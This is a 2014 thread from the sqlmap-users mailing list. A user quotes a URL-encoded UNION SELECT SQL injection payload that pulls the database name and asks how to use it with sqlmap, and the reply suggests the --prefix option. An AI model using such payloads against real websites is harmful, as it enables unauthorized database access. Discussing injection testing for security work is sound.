Re: [sqlmap-users] I want to use custom payload, but I don't know DIY

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Could try —prefix=“where “ although %23 is a hex encoded #.

> On Dec 28, 2014, at 12:07 PM, is2reg <is...@16...> wrote:
> 
> Hi,
>     the payload is :
>     %20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
>  
>     Can't replace "where" with "and", and can't replace "%23" with "#", otherwise the result is incorrect, how can I use this payload with sqlmap ?
>     Thanks !
>  
> 2014-12-29
> is2reg
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming! The Go Parallel Website,
> sponsored by Intel and developed in partnership with Slashdot Media, is your
> hub for all things parallel software development, from weekly thought
> leadership blogs to news, videos, case studies, tutorials and more. Take a
> look and join the conversation now. http://goparallel.sourceforge.net_______________________________________________ <http://goparallel.sourceforge.net_______________________________________________/>
> sqlmap-users mailing list
> sql...@li... <mailto:sql...@li...>
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>